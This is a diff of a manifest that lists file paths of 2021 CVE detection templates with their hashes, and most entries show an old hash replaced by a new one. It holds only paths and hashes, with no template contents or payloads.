+http/cves/2021/CVE-2021-1499.yaml:b4d383a16e2dc3ebb35a75e5e6bd1cb886d3709d +http/cves/2021/CVE-2021-20031.yaml:c8c089b85634ffae094083a1eb8be24b291ee383 +http/cves/2021/CVE-2021-20038.yaml:c882fe090e92a62ebec49ac1e87d2e9f437265ff +http/cves/2021/CVE-2021-20090.yaml:a20485f9d04402b8906aa2b2aa573b7c494457b7 +http/cves/2021/CVE-2021-20091.yaml:8dc1649b6e1c5849a8cd2518b213c598c907f8b6 +http/cves/2021/CVE-2021-20092.yaml:36705656b04ed28e30bcc7bd186068d4c18e31e4 +http/cves/2021/CVE-2021-20114.yaml:74a236da48c56aa98566d06b66f3e1bd9e2c8c7f +http/cves/2021/CVE-2021-20123.yaml:a9e1e1f054f7381644ac65398141c6114312d01d +http/cves/2021/CVE-2021-20124.yaml:ebc949a571c8993fdcf624924380a998bd1c7efb +http/cves/2021/CVE-2021-20137.yaml:1398fa8f05c200719e485ecbe00c38e06e5cf604 +http/cves/2021/CVE-2021-20150.yaml:2e543fbe1e63278bb2816195da5a7719e40af3d5 +http/cves/2021/CVE-2021-20158.yaml:20f7a33cd3390cc41f4295960ae1bda11d886bfa +http/cves/2021/CVE-2021-20167.yaml:21d37702462092c4060ac454a101eee77bb1c225 +http/cves/2021/CVE-2021-20323.yaml:c0f2ea4ad56b82cd943c6b66fe66224a04a3952d +http/cves/2021/CVE-2021-20792.yaml:92abe776e6804065e4122d770fb5171dc6ed3bd9 +http/cves/2021/CVE-2021-20837.yaml:bb3461e9fbb1fac8cba38bcc583ffe26c706b992 +http/cves/2021/CVE-2021-21087.yaml:5e3def9013f6a8f7278983d9f52bd5f3ea15839b +http/cves/2021/CVE-2021-21234.yaml:42617bcaa1fb5e9377fe524f59c9b55d150cfbd4 +http/cves/2021/CVE-2021-21287.yaml:f251f266cd0b017e15172565129ecb856ccd567c +http/cves/2021/CVE-2021-21307.yaml:08f821f7bd65c54e11c1f838c89b9abcd8ce141e +http/cves/2021/CVE-2021-21311.yaml:255eb357ba8917a7bef48bec9028fbd81898717e +http/cves/2021/CVE-2021-21315.yaml:3da0472bde000005d28c614bacf05a4ece2e6019 http/cves/2021/CVE-2021-21345.yaml:6b66165292f268fa48384d2afd3bbf22e9ddabf2 -http/cves/2021/CVE-2021-21351.yaml:06b04c58fcc098885749880d338f3d51ec4b50b6 -http/cves/2021/CVE-2021-21389.yaml:3bd0fbdb516cd80a0b488cd6691260eebaa78e40 -http/cves/2021/CVE-2021-21402.yaml:3c34519579a07e81d2bff6b3e73b123ef22eb192 -http/cves/2021/CVE-2021-21479.yaml:08312209d33e6a826be67cd5d2f452541cc6b8c5 -http/cves/2021/CVE-2021-21745.yaml:b4b5f59c5b29a58a50f4677beeacd40b3c8b4c24 -http/cves/2021/CVE-2021-21799.yaml:d290f37e97ff189031452ff0892b0d437535b189 -http/cves/2021/CVE-2021-21800.yaml:55d42a6c66e2cf9357684c43b4b2bbb3713fdf5c -http/cves/2021/CVE-2021-21801.yaml:722d05be6cf176b60e9893f83ee717e6f81d0678 -http/cves/2021/CVE-2021-21802.yaml:2cd6c43a2dd03fa5fde0fdb65ad7ae2dd9145ac7 -http/cves/2021/CVE-2021-21803.yaml:b08564f9400f40a1efb65fd6a0c912801b2e4c38 -http/cves/2021/CVE-2021-21805.yaml:f6db5014e30a259a6029695bee786534e6ee3413 -http/cves/2021/CVE-2021-21816.yaml:30aa644b462caf2d94f9ed30ebe8fbde7e929e95 -http/cves/2021/CVE-2021-21881.yaml:9906ffcf3470a1b14fff1de29f819a49c58ff638 -http/cves/2021/CVE-2021-21972.yaml:e703045537bf487b23d0afebddd9351925c72129 -http/cves/2021/CVE-2021-21973.yaml:72c5d98c89d8623e16681c1cdeba7dda935a419e -http/cves/2021/CVE-2021-21975.yaml:cda78388f3c496fb9878068a4541fa29120bb5d9 -http/cves/2021/CVE-2021-21978.yaml:d5f929d3b8925712acf42a6bae36b4dab700dff4 -http/cves/2021/CVE-2021-21985.yaml:db0fe438a32e66e2f3b8a5f21763060bd5cdb710 -http/cves/2021/CVE-2021-22005.yaml:239d5e7276cf9b33b2f34408c9a7143e9af6138a -http/cves/2021/CVE-2021-22053.yaml:c60610a5ea31827e39b669162e16adbe6799e7ba -http/cves/2021/CVE-2021-22054.yaml:cf6c7a24e2eac07bb7468a39dd75a5676445bee4 -http/cves/2021/CVE-2021-22122.yaml:bfbb27e66a50ce074b01c0330d92791cab4b63e0 -http/cves/2021/CVE-2021-22145.yaml:2f9db5b8ceb2a018f75a6030d9539c5a55e11c41 -http/cves/2021/CVE-2021-22205.yaml:902031928a2d2124300ce459d42c942cf386fd74 -http/cves/2021/CVE-2021-22214.yaml:7030ce16990aaa17c4f754dea452e3beb6698246 -http/cves/2021/CVE-2021-22502.yaml:dbbfc5da75064290d3f83e5a773647a14fb25fe5 -http/cves/2021/CVE-2021-22873.yaml:13cd8eafa0fde06f77d25afb16e8070448695166 -http/cves/2021/CVE-2021-22911.yaml:dfad25f0bb99938276e318df200b0985d0c88336 -http/cves/2021/CVE-2021-22986.yaml:2ecad4022d95fa5099ad06d6f5dcda483097ed7e -http/cves/2021/CVE-2021-23241.yaml:6fe1b483f150b756b913efbd3d74b785c49ac731 -http/cves/2021/CVE-2021-24145.yaml:89d98979c055f9e03e95daa845d5d247e45e0110 -http/cves/2021/CVE-2021-24146.yaml:e33f3d93664f37e53bab920372415694f56c97c2 -http/cves/2021/CVE-2021-24150.yaml:7976b2c9af20fd8532586b1a32a7dd8fcf409b5d -http/cves/2021/CVE-2021-24155.yaml:3a6bf54eab123a8eb0e8de74ea1a9386693b2ac1 -http/cves/2021/CVE-2021-24165.yaml:3458454c67ea192fc2d898d7351411e81d89ee84 -http/cves/2021/CVE-2021-24169.yaml:4dbd733ae5e17c5bf70f3c29ca10b0c15a3302e9 -http/cves/2021/CVE-2021-24176.yaml:9034fd48d467aa8ed262236bbcc66629e299a3d2 -http/cves/2021/CVE-2021-24210.yaml:6a8bb7fbafce98d4a3850107aedbfd468404cf75 -http/cves/2021/CVE-2021-24214.yaml:55dcb42b06aa88e66522aeadc9531ba004b6f30f -http/cves/2021/CVE-2021-24226.yaml:6bdd6d3e281baf60ac482df622e9b6f26ef6414b -http/cves/2021/CVE-2021-24227.yaml:47556e3c960e831ee17679fc2c58ed894f9c0a7f -http/cves/2021/CVE-2021-24235.yaml:29dafa92ba16138d90e30b7934f86cee0fc3e299 -http/cves/2021/CVE-2021-24236.yaml:f6e231bdf47a5ea5f94bd0bfa6cd37dd21cc500d -http/cves/2021/CVE-2021-24237.yaml:6bc3383743a564c6c74edf34f96f21746cda048e -http/cves/2021/CVE-2021-24239.yaml:28c9c5451cde9aaed3d57702480ef7448454aad2 -http/cves/2021/CVE-2021-24245.yaml:230df38606e86e5eb38770092528997a5c430a15 -http/cves/2021/CVE-2021-24274.yaml:3b86fccf35435e0691081a3a7ecc0051793c2012 -http/cves/2021/CVE-2021-24275.yaml:5275dc7ff42c8e1cf1dec65cd85bc9ab9da63cf6 -http/cves/2021/CVE-2021-24276.yaml:7b3bd2d97b28cdbac05662ecfd0d7817dd50f3e9 -http/cves/2021/CVE-2021-24278.yaml:348f19bc6421dfeb9b9389b6e1b4a0c9cf40b26e -http/cves/2021/CVE-2021-24284.yaml:3e86c8048dda35695b04a28504de37b63633725d -http/cves/2021/CVE-2021-24285.yaml:084afa0f538c0a98faf4a3c072dd9f25ec39857a -http/cves/2021/CVE-2021-24287.yaml:9b38524b317818d041a335ea65828d8a5aed46e1 -http/cves/2021/CVE-2021-24288.yaml:918c4dd7f9831ba1082675dfa1f3934a9ac52f92 -http/cves/2021/CVE-2021-24291.yaml:fa7414cd4869fbbe4b607745c604aac953e2fb14 -http/cves/2021/CVE-2021-24298.yaml:9d5a76c3f68e746611f9475c11f538accc79528a -http/cves/2021/CVE-2021-24300.yaml:ce68406b1e5c21496265734b8f95049710586820 -http/cves/2021/CVE-2021-24316.yaml:f638572b1fa4415612202b966b864d6b92b57294 -http/cves/2021/CVE-2021-24320.yaml:5d5a5cf6f223a50a976e8f23e0c0c3fea27a0a24 -http/cves/2021/CVE-2021-24335.yaml:8799f0b8e7c873c4b4cac2f83e284ce637ab51f3 +http/cves/2021/CVE-2021-21351.yaml:1c31e7e6c8e31171d640fe6cc40cff1f73d29dc4 +http/cves/2021/CVE-2021-21389.yaml:ae5828bbd8347034e3bb18c01e8e635e20df2229 +http/cves/2021/CVE-2021-21402.yaml:0d9349727149cb4d62f514d3c4c5517c506a4b00 +http/cves/2021/CVE-2021-21479.yaml:4d2736ef09a7e7c24e0be3c6d38fd5ffb5f03e17 +http/cves/2021/CVE-2021-21745.yaml:1fd350508411d4c27a4b255a5b91c87d6e8f592f +http/cves/2021/CVE-2021-21799.yaml:b3b2d0e6cca6d465f8d421e6bea8ee356163d5ff +http/cves/2021/CVE-2021-21800.yaml:e4595f125a6e61e43e8193e4c65f7f998db35536 +http/cves/2021/CVE-2021-21801.yaml:6a4ac226231cb3a241122da5632ab0dfea22f1f1 +http/cves/2021/CVE-2021-21802.yaml:74103b07b644f0745779014f3fd0f2f58377d57f +http/cves/2021/CVE-2021-21803.yaml:f9b1e177d54ca42251beb6ad6986a4b6efb8957d +http/cves/2021/CVE-2021-21805.yaml:9d51735567b1d17b450da393a59d69dda44634de +http/cves/2021/CVE-2021-21816.yaml:5084113f15a65f8d6d46341fb0df7e182ceea53c +http/cves/2021/CVE-2021-21881.yaml:1c46063be0f8e1b78d1f823aa6d78cba704862be +http/cves/2021/CVE-2021-21972.yaml:9c2fdb4d27c3bd6388fb24fb7b72271b8d4e33e6 +http/cves/2021/CVE-2021-21973.yaml:4e1e427245600ee1460ca94a7c4b5c6e6fe30317 +http/cves/2021/CVE-2021-21975.yaml:83ea1c620869ec1ba0a0cd258addf2854b028069 +http/cves/2021/CVE-2021-21978.yaml:f6e86259fcdbd940c7a1bc9d34f2381b57648012 +http/cves/2021/CVE-2021-21985.yaml:9ce82b023b5d374afa0520c8227329eadb8189f1 +http/cves/2021/CVE-2021-22005.yaml:62c2a74db7a2c26c7e4afcbbbc5c8a75673cbe7d +http/cves/2021/CVE-2021-22053.yaml:dcb3bc1c74fd1bc7c1fc4f1b464867f40eabf53a +http/cves/2021/CVE-2021-22054.yaml:2621dd07c75b4e6f0fdccdf6e22c0f261da758da +http/cves/2021/CVE-2021-22122.yaml:43dfb475fa5af15f2348a8d21bbf281b312ab1e2 +http/cves/2021/CVE-2021-22145.yaml:4677b4351633ecfe0670ca1d312c2824133acefd +http/cves/2021/CVE-2021-22205.yaml:732583f0eaab59ca6093e510896bc6098270ce30 +http/cves/2021/CVE-2021-22214.yaml:692c414b0b16db285004c87c9c9e0f35066840cb +http/cves/2021/CVE-2021-22502.yaml:b931e08153a133845a5e5fbff0a44c987d18da28 +http/cves/2021/CVE-2021-22873.yaml:7709e7c4fe0982f1fe293b35a0bf2954e61e0bba +http/cves/2021/CVE-2021-22911.yaml:20ebe9d97381f0f081eb73b9c2097ab04941e4ab +http/cves/2021/CVE-2021-22986.yaml:d55a06f841f8595379bd41f5f5aacec4ca89a8dd +http/cves/2021/CVE-2021-23241.yaml:de0055ac19b136703035208f7fd1463503246f4c +http/cves/2021/CVE-2021-24145.yaml:49b313c1d361ceac34534b9bd3dd75e33d73be97 +http/cves/2021/CVE-2021-24146.yaml:caed715714a6a1c9d43618d7cf65228145133ab9 +http/cves/2021/CVE-2021-24150.yaml:c160c1e722fed63c7d29ff847f6b9a74cfb6b12c +http/cves/2021/CVE-2021-24155.yaml:ee1d555526eb8eeec6c95b402104bec92d7a0dba +http/cves/2021/CVE-2021-24165.yaml:fcd219b58e1f9f6be5bf37592306f77d68036a9c +http/cves/2021/CVE-2021-24169.yaml:4c8a3fb871873963025bb2148c6f8f284451d182 +http/cves/2021/CVE-2021-24176.yaml:d47387864130fe00d846d7eb9ccb5a7432a6355b +http/cves/2021/CVE-2021-24210.yaml:258b02016dc35ac9a183a82270ba4cd2c1ae0c4a +http/cves/2021/CVE-2021-24214.yaml:06dbf63399e5fbb6bd50ab6b58e8c845a2e379d3 +http/cves/2021/CVE-2021-24226.yaml:28b957f873c26de2eee2a8135a79cc24198532a4 +http/cves/2021/CVE-2021-24227.yaml:ec2b7bd3d7a9d7ce04d2a4d117e1c85f00052cb0 +http/cves/2021/CVE-2021-24235.yaml:63b9ecb37070cdc9ffb17dfc29cd9fdb5a89785b +http/cves/2021/CVE-2021-24236.yaml:11d2815c8eeb9c29f5b04fcfcdc13754c1244466 +http/cves/2021/CVE-2021-24237.yaml:3834c207eca79557e3f8d1fd75b667e097a6e00c +http/cves/2021/CVE-2021-24239.yaml:fa32add3ea76d8e8323353098a4c3d938411477d +http/cves/2021/CVE-2021-24245.yaml:b3d19a66d711c03d6b981b9a986890a00661f123 +http/cves/2021/CVE-2021-24274.yaml:e1b8a8be69a748287e098123ded18bbcbeb93e2e +http/cves/2021/CVE-2021-24275.yaml:276f3dbe9f089436f01abf8d958bfaf540bf5a5d +http/cves/2021/CVE-2021-24276.yaml:d1c4dd530bb49ca3cf8eb201b93d9c6b06bffa5d +http/cves/2021/CVE-2021-24278.yaml:1151f780988debad3e3add69847c83c5402cc2dc +http/cves/2021/CVE-2021-24284.yaml:2d17f18e9041ec54d042f372c16331c61662d82d +http/cves/2021/CVE-2021-24285.yaml:a0dfeaf16e5a042d580c58f9c5586f9e65840fc8 +http/cves/2021/CVE-2021-24287.yaml:601eae18d0a7cb8a5abec6b1050c642f3e665b41 +http/cves/2021/CVE-2021-24288.yaml:2b7a444aeb50d2dc00fb59601969bdb43781a508 +http/cves/2021/CVE-2021-24291.yaml:652e91a534e7f8a2f0244409537b3b68bd64835c +http/cves/2021/CVE-2021-24298.yaml:8c86f16e9895cf7d6e71f7c7313d1ec4e9099139 +http/cves/2021/CVE-2021-24300.yaml:0a08dacc0daae1631112d30f28fd89b3e6134771 +http/cves/2021/CVE-2021-24316.yaml:a46c5e37327af31cbb729ba022a7d69b37632e6c +http/cves/2021/CVE-2021-24320.yaml:a2797f002f4494edfb0d32abd043a5e9029695b6 +http/cves/2021/CVE-2021-24335.yaml:5ab3d3b0c5d98065c96cd0121c9ce05cd9f5b689 http/cves/2021/CVE-2021-24340.yaml:855bb39ae485ce3df8905f932887c9c4cf6b6e9d -http/cves/2021/CVE-2021-24342.yaml:7b37a081c0de89e0462c0dcd32d492e09bebdaa0 -http/cves/2021/CVE-2021-24347.yaml:ad5a1f41f73b6b8ade1c096eafe3c38921b53a47 -http/cves/2021/CVE-2021-24351.yaml:47d2406cced1b7ceac7a493dcbd6c9f6a2e6650f -http/cves/2021/CVE-2021-24358.yaml:899206151dba879d27a37ff89a4d32592feeb090 -http/cves/2021/CVE-2021-24364.yaml:0cedcceff2774022147df344eae6da2d9952c31c -http/cves/2021/CVE-2021-24370.yaml:f08302abf94f5b9564b8f631d58c4414cbf26a23 -http/cves/2021/CVE-2021-24387.yaml:23b832dffd53f68a0b9f90ed02aedc9ae861b4aa -http/cves/2021/CVE-2021-24389.yaml:6af6355d2c3b4dc5bb716c06e1692f34595c99f6 -http/cves/2021/CVE-2021-24406.yaml:605a1802602dc413448a33f5069e56f23a02394d -http/cves/2021/CVE-2021-24407.yaml:cbb05700ba6905ae312562608736756aa4566cbb +http/cves/2021/CVE-2021-24342.yaml:1847288de609f1ef2aab8d166c6c0d875188beb6 +http/cves/2021/CVE-2021-24347.yaml:2e2f65626b4f60d838d555b7e82a5b262b16500b +http/cves/2021/CVE-2021-24351.yaml:27cbe9d58930e62c000f85f673f1e197f4aa1fc0 +http/cves/2021/CVE-2021-24358.yaml:e727c527f98ee6f1c604fc75d64101b1d105c40c +http/cves/2021/CVE-2021-24364.yaml:f59858cbdab312c603ab0b3abada06e08ffe52cd +http/cves/2021/CVE-2021-24370.yaml:e20172a68ff1db0679dfd0c02ef526f4b792f298 +http/cves/2021/CVE-2021-24387.yaml:dcd51a54d9f7f7506ab3ef77f767bef89f7ece90 +http/cves/2021/CVE-2021-24389.yaml:ce643ad831a4c63cf33f5a7967bd18e23077a56f +http/cves/2021/CVE-2021-24406.yaml:4c8b9f293d41ba1838c8515bd8ccd653f91a92ed +http/cves/2021/CVE-2021-24407.yaml:9782ee1f493c4709d4bf9c79abbf838ac0287b33 http/cves/2021/CVE-2021-24435.yaml:4a795b1dbe279b6f7f8e8cafd1ac3f5c71217762 -http/cves/2021/CVE-2021-24436.yaml:2b77064019d96f74adb6699c9e579a783858fb91 -http/cves/2021/CVE-2021-24452.yaml:961bad83e2c7f66d242281e4f084fc7bab156b3d -http/cves/2021/CVE-2021-24472.yaml:8412343541aeaee4b31dc9df2709ef749c0a8e4c -http/cves/2021/CVE-2021-24488.yaml:d1460b5fec93d5affeaa3aabcfe28db0b05f8f8e -http/cves/2021/CVE-2021-24495.yaml:d39a5045a10d8938c4914ce17330665fca6dfda3 -http/cves/2021/CVE-2021-24498.yaml:12fa0261ea6b36b837eb87d8ce1d803a2f2cf0aa -http/cves/2021/CVE-2021-24499.yaml:33b5737b57d503aedbc2dcdc2e5796b8e83e1bc4 -http/cves/2021/CVE-2021-24510.yaml:f1b05e8e7b43e1c48cf7587a20a411d986950122 -http/cves/2021/CVE-2021-24554.yaml:93b9442db6d766a5cc76cc0293ddbb0576636b6d +http/cves/2021/CVE-2021-24436.yaml:50b80bf3d672ba6d3346f8f441f3ecf77fa0f3e0 +http/cves/2021/CVE-2021-24452.yaml:73e07c60cddaa14e5d12af2c5ff60bd6778fc66f +http/cves/2021/CVE-2021-24472.yaml:a4f6c3b1af353da3bb10583c43ce1d1e43239828 +http/cves/2021/CVE-2021-24488.yaml:3886b14870ef086e508c290e7492eafc35748244 +http/cves/2021/CVE-2021-24495.yaml:5045b1b9aa2453da48e9a265f576cfa0ef65a825 +http/cves/2021/CVE-2021-24498.yaml:f6cc31ad51367a5ff14e72edd8111ddb4e771739 +http/cves/2021/CVE-2021-24499.yaml:5a7bed4b0ef2e96dce0fed01663b6277a15e48a3 +http/cves/2021/CVE-2021-24510.yaml:d1a6b9d1d0ba8d07afa3b05828782fe7d6d90573 +http/cves/2021/CVE-2021-24554.yaml:44bbd6a71d876ead914013a74318604e78a9a996 http/cves/2021/CVE-2021-24647.yaml:1243d5c384ad193a0bff7298f29ed31ef0c3dda0 -http/cves/2021/CVE-2021-24666.yaml:376c70974b03358c46a1aca529985b75da028fc2 +http/cves/2021/CVE-2021-24666.yaml:ea5557aaa5b05f9c6323334f9cc3e6bbf3ff0971 http/cves/2021/CVE-2021-24731.yaml:5fa67ce002d0bf077f2e94f2f7416893de80a07c -http/cves/2021/CVE-2021-24746.yaml:793d7ce0a9e66c09382bf4feafdc14d732a5d2c8 -http/cves/2021/CVE-2021-24750.yaml:b52e1668c5c538502cab5d2cbb5c394e0d684f3d -http/cves/2021/CVE-2021-24762.yaml:34f00ab9034e789bc3eab8b972a0d6b43ff5e725 -http/cves/2021/CVE-2021-24827.yaml:8eaec237bb5a6ffb379226e1e7362923c3600af9 -http/cves/2021/CVE-2021-24838.yaml:46459e692ee5d4f840a26afbf883abd01f994608 -http/cves/2021/CVE-2021-24862.yaml:acea6ff5f197ee3c3f6db26302f3faff53e9fcd5 -http/cves/2021/CVE-2021-24875.yaml:55ef32fe43ae978b2bc85160913c3f173cfebb4c -http/cves/2021/CVE-2021-24891.yaml:c0012678ca4e62a9261394077f8374dff52a35d4 -http/cves/2021/CVE-2021-24910.yaml:ab2d1446ab0f5bc9795a0bad2c58963b72e1973d -http/cves/2021/CVE-2021-24917.yaml:bce1bbef608083b6b70e1ae27f78642945f6adfe -http/cves/2021/CVE-2021-24926.yaml:00102a5997ac472cdd01155abf741a2524457218 -http/cves/2021/CVE-2021-24931.yaml:645ad3e2fccacb130fc59b69e88687d625ae8b5a -http/cves/2021/CVE-2021-24940.yaml:125a27db5584c446cc766d8404e6980ee3c26736 -http/cves/2021/CVE-2021-24946.yaml:29192e28c518ef67c7e016d2b41b5f4e7d957d92 -http/cves/2021/CVE-2021-24947.yaml:c09fe321740b912360d6fde4f1fb4297f351f320 -http/cves/2021/CVE-2021-24970.yaml:d285c8803c37851a7b067de085d1b98c51376ff3 -http/cves/2021/CVE-2021-24987.yaml:99c24e87700bffb41ac5e8e0b446d6d8f7083cab -http/cves/2021/CVE-2021-24991.yaml:684dfb55ec39d18566180d568b05063b5e29b870 -http/cves/2021/CVE-2021-24997.yaml:e44b2cab910c778c2b7923528b75d9e9c6969d02 -http/cves/2021/CVE-2021-25003.yaml:be7808cc2d580a985911af24f70cd116282524d1 -http/cves/2021/CVE-2021-25008.yaml:9f75d7f57936f3569375ac0bf38b8c6aa8ad6099 -http/cves/2021/CVE-2021-25028.yaml:11e47a024df59edf76120716bdfb9855b2b6370d -http/cves/2021/CVE-2021-25033.yaml:5e9e335513a72f8e155ff60b5f288597ce273ded -http/cves/2021/CVE-2021-25052.yaml:4d6968f78d5ff785cfe03cc9e28310e078d599aa -http/cves/2021/CVE-2021-25055.yaml:01f0e48edbf2d915a3feaada3d9c72983ddb5c6b -http/cves/2021/CVE-2021-25063.yaml:7044312c70822ad185eea254ae3434d8b39acdbf -http/cves/2021/CVE-2021-25067.yaml:1334c60b54de1343801b71f297ed4ca11cc1b1ca -http/cves/2021/CVE-2021-25074.yaml:798b4fa48b608729201caf72f277ead674adaec3 -http/cves/2021/CVE-2021-25075.yaml:bc7c2a65f3eb39022b8bd0406d315333e1c018a6 +http/cves/2021/CVE-2021-24746.yaml:94e5c8007028ce2b0a3e00e6ac3c1557554b47dc +http/cves/2021/CVE-2021-24750.yaml:0b24edb69b68bce79767451938e75cb5cd3d5a39 +http/cves/2021/CVE-2021-24762.yaml:3b8fe41e08ca1c6f1453968b63d877950db64e14 +http/cves/2021/CVE-2021-24827.yaml:a0e9f4d2294b71f42d6386706645b16b047322e2 +http/cves/2021/CVE-2021-24838.yaml:46b8c9988b566ed4e531773bea00912339a2f246 +http/cves/2021/CVE-2021-24862.yaml:26b1b050c308b46b2254d6a7d97422acfd502871 +http/cves/2021/CVE-2021-24875.yaml:e27c622faec36d46048ad57987efa2fc369ed8af +http/cves/2021/CVE-2021-24891.yaml:b8f503d06d03be6820a27f4d761cd820cc85938d +http/cves/2021/CVE-2021-24910.yaml:166d1a2743c6aa5a0aa6febd8f7921477f77b31b +http/cves/2021/CVE-2021-24917.yaml:a94baa71a0486f9a31a119ed402ad680fc06ae13 +http/cves/2021/CVE-2021-24926.yaml:1891c48ba4828b2e622a6275cc03438c3b7329c9 +http/cves/2021/CVE-2021-24931.yaml:f403aca26cba73126eb7e8e1bfe0dc18dd9ad470 +http/cves/2021/CVE-2021-24940.yaml:d95cf49c858790d4f1df1d06758e031d9673788a +http/cves/2021/CVE-2021-24946.yaml:7d02635139824cad9bc07a53bd8ed768273047ef +http/cves/2021/CVE-2021-24947.yaml:f632edcd6801d88509a19dad419d7f8441e26133 +http/cves/2021/CVE-2021-24970.yaml:818095dfda3d7a4b9e620a2c24c342f93b5175d0 +http/cves/2021/CVE-2021-24987.yaml:5c826e0a0565b36134c83c0a81a5c8bb9f9b215a +http/cves/2021/CVE-2021-24991.yaml:db948f0cd62eb0b6c7c5aacf96866bdfbfb58b4c +http/cves/2021/CVE-2021-24997.yaml:8aa368af78bd4990a1d178430fe6714a084436ea +http/cves/2021/CVE-2021-25003.yaml:bf06f011d142f90e59b567b684615d7cfa40fd3c +http/cves/2021/CVE-2021-25008.yaml:85514593af1f4742bc9ee84b5d54ef629b57f54f +http/cves/2021/CVE-2021-25028.yaml:117b821b0ff3d9f268561af338369a28bf846a05 +http/cves/2021/CVE-2021-25033.yaml:1ee90e02b844bcd59235d7d77451c07108b1b4ae +http/cves/2021/CVE-2021-25052.yaml:bb599d76602a300b15b10643b20137c43647ee58 +http/cves/2021/CVE-2021-25055.yaml:9c13ae5a408533886e2daf4224e12bdfeddadf91 +http/cves/2021/CVE-2021-25063.yaml:858f17a1b29bbd63f9846016fd7850f0964e1fb1 +http/cves/2021/CVE-2021-25067.yaml:695db580db88078cb23d3ec33a1b578bec22e5b5 +http/cves/2021/CVE-2021-25074.yaml:554b55eda92fb019731d8197e143d5b647b3d54a +http/cves/2021/CVE-2021-25075.yaml:4fa0e2e3f021c5ce257cc388dfe52f70cede10b3 http/cves/2021/CVE-2021-25078.yaml:387a1ce3b9115aec8f9d0213449240fd343640d5 -http/cves/2021/CVE-2021-25085.yaml:af36dea5064a6e1e12e6d8a53e4b6b599a17894c -http/cves/2021/CVE-2021-25099.yaml:76d3c88bfd27e3e27271678ffd757836d5e564e9 -http/cves/2021/CVE-2021-25104.yaml:9ecb13f52933ae806d2c79068a636d60101b14f0 -http/cves/2021/CVE-2021-25111.yaml:a961a22dbb5efa4c3e176c6e481f1127294c3767 -http/cves/2021/CVE-2021-25112.yaml:883a7babeaeab3166cad1874fb8668828e972464 -http/cves/2021/CVE-2021-25114.yaml:2abff0e6f297c5cce2e1d0397d62679566848133 -http/cves/2021/CVE-2021-25118.yaml:98ca94ac9324bd1d5cd666b27ace2400e8041664 -http/cves/2021/CVE-2021-25120.yaml:d283482ce598125dc47b8eab273c631bd26ce74c -http/cves/2021/CVE-2021-25281.yaml:f0739a4ffae86374323dd426842360d438c536b2 -http/cves/2021/CVE-2021-25296.yaml:3c66731902086992cdddb0289373b8f5fd0b9c85 -http/cves/2021/CVE-2021-25297.yaml:5466c149d4d256b5262b13482450f474d6c038d5 -http/cves/2021/CVE-2021-25298.yaml:e4f0bb06fdba5d0f76e64d2fc5ebee6a45285e93 -http/cves/2021/CVE-2021-25299.yaml:57f4d0ae877e768e48eae42d1da370cc658075f9 -http/cves/2021/CVE-2021-25646.yaml:4bd3f96db685ae3a0e20ec0f93c816d9e73b98a9 -http/cves/2021/CVE-2021-25864.yaml:19a96678b3b7112ca58822bdb5f75f4b6ef6c85c -http/cves/2021/CVE-2021-25899.yaml:67944ea8d5b42e747bb55affdd002f4f40d65fd5 -http/cves/2021/CVE-2021-26084.yaml:946a3bc637e3f3306995d7123f43ba17224db8c7 -http/cves/2021/CVE-2021-26085.yaml:4dc254791017f137ee3939e1a60cc615467b09ab -http/cves/2021/CVE-2021-26086.yaml:82330a5c19d9fd81a50c7fdd236662bf25cdbd65 -http/cves/2021/CVE-2021-26247.yaml:50e36d499fc02daf94c7333e952062e98608c2bb -http/cves/2021/CVE-2021-26295.yaml:e6f7811175a1821785d8826f3176575e36ab4070 -http/cves/2021/CVE-2021-26475.yaml:909a4435796ad98ea2bb5af7455162b49f0a95be -http/cves/2021/CVE-2021-26598.yaml:8b1450b4613c086fea18b65fb7e472a5df5ab8ff -http/cves/2021/CVE-2021-26702.yaml:1ba865cb517a00bf7b4bd078fae905d76687d265 -http/cves/2021/CVE-2021-26710.yaml:a5bf1ee25d239914abef3fd20a982fa7017dc932 -http/cves/2021/CVE-2021-26723.yaml:3eeabbb2f2ae372f0a57a47810c87504fe7dfe91 -http/cves/2021/CVE-2021-26812.yaml:2c660d64ac995ae472de3687faa6e06b0efa23f0 -http/cves/2021/CVE-2021-26855.yaml:9f2dfd66d978582ab411186bb519273280193efa +http/cves/2021/CVE-2021-25085.yaml:c1a70ef1a953f82b0fce73ca6568aa8d199b6ef4 +http/cves/2021/CVE-2021-25099.yaml:396b538cb3013c2aabbfc030f7793dbfc477fbd7 +http/cves/2021/CVE-2021-25104.yaml:be1eb6c51477bdae3058665e1b64a79eca75b34a +http/cves/2021/CVE-2021-25111.yaml:8d86bf92db8106df177b2d26e27f19a580290c9b +http/cves/2021/CVE-2021-25112.yaml:60650b1fd8a08f25ac8a0671b51389583dd586d3 +http/cves/2021/CVE-2021-25114.yaml:f6a1a61c84437991edf4887c16fb7f98c2bb0717 +http/cves/2021/CVE-2021-25118.yaml:0e41c2d71780e8e0f9cc177f4c86d28bc1ad6c17 +http/cves/2021/CVE-2021-25120.yaml:3898833ba88e5b3c4d6937870b046ead74412665 +http/cves/2021/CVE-2021-25281.yaml:9826447317b96a619354a9f945596cd1b90199ba +http/cves/2021/CVE-2021-25296.yaml:e66e5a7d2ce2536c58d46cea783405a3b59ca4c1 +http/cves/2021/CVE-2021-25297.yaml:a2278850031d0c20b7ef420bb9f5060922098014 +http/cves/2021/CVE-2021-25298.yaml:c4e311465650ef8aa4ae5ce29e30c9f6e47e6314 +http/cves/2021/CVE-2021-25299.yaml:a34fc2df84c868f9ef262cdf380c2e48a990709f +http/cves/2021/CVE-2021-25646.yaml:5beaf7266fc437bf08aa09b04392f8079a8b6a10 +http/cves/2021/CVE-2021-25864.yaml:611c1d85e27217c83a972c9fafdbd69c735873d4 +http/cves/2021/CVE-2021-25899.yaml:9b303a663031accb13ba51366365ed44a7f02669 +http/cves/2021/CVE-2021-26084.yaml:9cdfb40e239e4973178b86ea2232934e29fd66a4 +http/cves/2021/CVE-2021-26085.yaml:dff821f791aaa4db9146e61819094d31df3d5d54 +http/cves/2021/CVE-2021-26086.yaml:1b37240ef12745605c6bf5dd0e1d2265f163335e +http/cves/2021/CVE-2021-26247.yaml:04cdd4ab1ca8a9f883fd5e7dd4d3f994995acc5b +http/cves/2021/CVE-2021-26295.yaml:d7d8af7e10b7b9bf4b4e310f22ae7bd073e9b8cf +http/cves/2021/CVE-2021-26475.yaml:214f1cf362a2a245e17486715812da2186f152fc +http/cves/2021/CVE-2021-26598.yaml:6b80989f7e241a3619602e5033a25c426162193c +http/cves/2021/CVE-2021-26702.yaml:3c6e09418a2267bd92dc83ec54f8a1c7be986e6b +http/cves/2021/CVE-2021-26710.yaml:0801c7dd345baabef148cd5b8215a1c49027c35a +http/cves/2021/CVE-2021-26723.yaml:deb0d4bbce0ce04f0df977bbb0468815d101c3d2 